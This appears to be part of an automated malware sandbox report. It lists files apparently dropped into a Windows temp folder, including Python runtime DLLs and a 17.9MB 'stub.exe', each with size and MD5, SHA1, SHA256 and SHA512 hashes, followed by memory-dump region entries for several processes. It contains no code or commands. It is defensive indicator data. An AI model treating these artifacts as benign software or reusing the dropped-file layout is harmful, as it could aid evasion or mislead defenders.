                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_2928_133637652944586099\libffi-7.dll
                                                                                                            Filesize

                                                                                                            32KB

                                                                                                            MD5

                                                                                                            eef7981412be8ea459064d3090f4b3aa

                                                                                                            SHA1

                                                                                                            c60da4830ce27afc234b3c3014c583f7f0a5a925

                                                                                                            SHA256

                                                                                                            f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

                                                                                                            SHA512

                                                                                                            dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_2928_133637652944586099\python3.dll
                                                                                                            Filesize

                                                                                                            63KB

                                                                                                            MD5

                                                                                                            07bd9f1e651ad2409fd0b7d706be6071

                                                                                                            SHA1

                                                                                                            dfeb2221527474a681d6d8b16a5c378847c59d33

                                                                                                            SHA256

                                                                                                            5d78cd1365ea9ae4e95872576cfa4055342f1e80b06f3051cf91d564b6cd09f5

                                                                                                            SHA512

                                                                                                            def31d2df95cb7999ce1f55479b2ff7a3cb70e9fc4778fc50803f688448305454fbbf82b5a75032f182dff663a6d91d303ef72e3d2ca9f2a1b032956ec1a0e2a

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_2928_133637652944586099\python310.dll
                                                                                                            Filesize

                                                                                                            4.3MB

                                                                                                            MD5

                                                                                                            c80b5cb43e5fe7948c3562c1fff1254e

                                                                                                            SHA1

                                                                                                            f73cb1fb9445c96ecd56b984a1822e502e71ab9d

                                                                                                            SHA256

                                                                                                            058925e4bbfcb460a3c00ec824b8390583baef0c780a7c7ff01d43d9eec45f20

                                                                                                            SHA512

                                                                                                            faa97a9d5d2a0bf78123f19f8657c24921b907268938c26f79e1df6d667f7bee564259a3a11022e8629996406cda9fa00434bb2b1de3e10b9bddc59708dbad81

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_2928_133637652944586099\select.pyd
                                                                                                            Filesize

                                                                                                            28KB

                                                                                                            MD5

                                                                                                            adc412384b7e1254d11e62e451def8e9

                                                                                                            SHA1

                                                                                                            04e6dff4a65234406b9bc9d9f2dcfe8e30481829

                                                                                                            SHA256

                                                                                                            68b80009ab656ffe811d680585fac3d4f9c1b45f29d48c67ea2b3580ec4d86a1

                                                                                                            SHA512

                                                                                                            f250f1236882668b2686bd42e1c334c60da7abec3a208ebebdee84a74d7c4c6b1bc79eed7241bc7012e4ef70a6651a32aa00e32a83f402475b479633581e0b07

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_2928_133637652944586099\sqlite3.dll
                                                                                                            Filesize

                                                                                                            1.4MB

                                                                                                            MD5

                                                                                                            926dc90bd9faf4efe1700564aa2a1700

                                                                                                            SHA1

                                                                                                            763e5af4be07444395c2ab11550c70ee59284e6d

                                                                                                            SHA256

                                                                                                            50825ea8b431d86ec228d9fa6b643e2c70044c709f5d9471d779be63ff18bcd0

                                                                                                            SHA512

                                                                                                            a8703ff97243aa3bc877f71c0514b47677b48834a0f2fee54e203c0889a79ce37c648243dbfe2ee9e1573b3ca4d49c334e9bfe62541653125861a5398e2fe556

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_2928_133637652944586099\stub.exe
                                                                                                            Filesize

                                                                                                            17.9MB

                                                                                                            MD5

                                                                                                            972d9d2422f1a71bed840709024302f8

                                                                                                            SHA1

                                                                                                            e52170710e3c413ae3cfa45fcdecf19db4aa382c

                                                                                                            SHA256

                                                                                                            1c666df4eafab03ecde809ffbc40dd60b8ac2fe7bdca5632c5c4002254e6e564

                                                                                                            SHA512

                                                                                                            3d84252756dcb4820b7794e9a92811d32631b9f3e9bd1a558fd040736b1472c0d00efb6ff7a13ae3bcd327f3bfac2b6ad94a5a3dfbc8ba54511a366c4f4727a6

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_2928_133637652944586099\vcruntime140.dll
                                                                                                            Filesize

                                                                                                            96KB

                                                                                                            MD5

                                                                                                            f12681a472b9dd04a812e16096514974

                                                                                                            SHA1

                                                                                                            6fd102eb3e0b0e6eef08118d71f28702d1a9067c

                                                                                                            SHA256

                                                                                                            d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

                                                                                                            SHA512

                                                                                                            7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

                                                                                                          • memory/244-276-0x0000000003220000-0x0000000003221000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/244-277-0x0000000000330000-0x0000000000B4E000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.1MB

                                                                                                          • memory/1492-504-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-21-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-662-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-661-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-436-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-656-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-241-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-434-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-655-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-152-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-660-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-284-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-631-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-624-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-614-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-613-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-18-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-19-0x0000000000251000-0x000000000027F000-memory.dmp
                                                                                                            Filesize

                                                                                                            184KB

                                                                                                          • memory/1492-240-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-485-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1492-20-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1516-611-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/1516-612-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/2432-3-0x00000000009F0000-0x0000000000E89000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/2432-4-0x00000000009F0000-0x0000000000E89000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/2432-2-0x00000000009F1000-0x0000000000A1F000-memory.dmp
                                                                                                            Filesize

                                                                                                            184KB

                                                                                                          • memory/2432-17-0x00000000009F0000-0x0000000000E89000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/2432-1-0x0000000077AB6000-0x0000000077AB8000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/2432-0-0x00000000009F0000-0x0000000000E89000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/2928-484-0x00007FF66E630000-0x00007FF66F105000-memory.dmp
                                                                                                            Filesize

                                                                                                            10.8MB

                                                                                                          • memory/2928-469-0x00007FF66E630000-0x00007FF66F105000-memory.dmp
                                                                                                            Filesize

                                                                                                            10.8MB

                                                                                                          • memory/3084-468-0x00007FF7607A0000-0x00007FF760DD6000-memory.dmp
                                                                                                            Filesize

                                                                                                            6.2MB

                                                                                                          • memory/3084-435-0x00007FF7607A0000-0x00007FF760DD6000-memory.dmp
                                                                                                            Filesize

                                                                                                            6.2MB

                                                                                                          • memory/3272-515-0x000001FDFA360000-0x000001FDFA372000-memory.dmp
                                                                                                            Filesize

                                                                                                            72KB

                                                                                                          • memory/3272-516-0x000001FDFA350000-0x000001FDFA35A000-memory.dmp
                                                                                                            Filesize

                                                                                                            40KB

                                                                                                          • memory/3924-49-0x0000000005E20000-0x0000000005E6C000-memory.dmp
                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/3924-40-0x000000007347E000-0x000000007347F000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/3924-41-0x0000000000FF0000-0x0000000001040000-memory.dmp
                                                                                                            Filesize

                                                                                                            320KB

                                                                                                          • memory/3924-42-0x0000000006110000-0x00000000066B6000-memory.dmp
                                                                                                            Filesize

                                                                                                            5.6MB

                                                                                                          • memory/3924-141-0x00000000066C0000-0x0000000006726000-memory.dmp
                                                                                                            Filesize

                                                                                                            408KB

                                                                                                          • memory/3924-47-0x0000000005D60000-0x0000000005D72000-memory.dmp
                                                                                                            Filesize

                                                                                                            72KB

                                                                                                          • memory/3924-43-0x0000000005B60000-0x0000000005BF2000-memory.dmp
                                                                                                            Filesize

                                                                                                            584KB

                                                                                                          • memory/3924-44-0x0000000005AF0000-0x0000000005AFA000-memory.dmp
                                                                                                            Filesize

                                                                                                            40KB

                                                                                                          • memory/3924-45-0x0000000006CE0000-0x00000000072F8000-memory.dmp
                                                                                                            Filesize

                                                                                                            6.1MB

                                                                                                          • memory/3924-48-0x0000000005DD0000-0x0000000005E0C000-memory.dmp
                                                                                                            Filesize

                                                                                                            240KB

                                                                                                          • memory/3924-46-0x0000000005F20000-0x000000000602A000-memory.dmp
                                                                                                            Filesize

                                                                                                            1.0MB

                                                                                                          • memory/3924-151-0x0000000006C50000-0x0000000006CA0000-memory.dmp
                                                                                                            Filesize

                                                                                                            320KB

                                                                                                          • memory/4152-144-0x0000016454FF0000-0x0000016455012000-memory.dmp
                                                                                                            Filesize

                                                                                                            136KB

                                                                                                          • memory/4424-222-0x0000000009990000-0x00000000099AE000-memory.dmp
                                                                                                            Filesize

                                                                                                            120KB

                                                                                                          • memory/4424-221-0x00000000099B0000-0x0000000009A26000-memory.dmp
                                                                                                            Filesize

                                                                                                            472KB

                                                                                                          • memory/4424-173-0x0000000000400000-0x0000000000470000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/4656-480-0x00007FF61A500000-0x00007FF61B735000-memory.dmp
                                                                                                            Filesize

                                                                                                            18.2MB

                                                                                                          • memory/4656-470-0x00007FF61A500000-0x00007FF61B735000-memory.dmp
                                                                                                            Filesize

                                                                                                            18.2MB

                                                                                                          • memory/4844-659-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/4844-657-0x0000000000250000-0x00000000006E9000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.6MB

                                                                                                          • memory/4976-466-0x0000000000AB0000-0x0000000000B06000-memory.dmp
                                                                                                            Filesize

                                                                                                            344KB

                                                                                                          • memory/4976-467-0x0000000000AB0000-0x0000000000B06000-memory.dmp
                                                                                                            Filesize

                                                                                                            344KB

                                                                                                          • memory/5032-217-0x0000000000400000-0x000000000273E000-memory.dmp
                                                                                                            Filesize

                                                                                                            35.2MB

                                                                                                          • memory/5056-170-0x0000000008290000-0x0000000008452000-memory.dmp
                                                                                                            Filesize

                                                                                                            1.8MB

                                                                                                          • memory/5056-172-0x0000000008B90000-0x00000000090BC000-memory.dmp
                                                                                                            Filesize

                                                                                                            5.2MB

                                                                                                          • memory/5056-65-0x0000000000400000-0x0000000000450000-memory.dmp
                                                                                                            Filesize

                                                                                                            320KB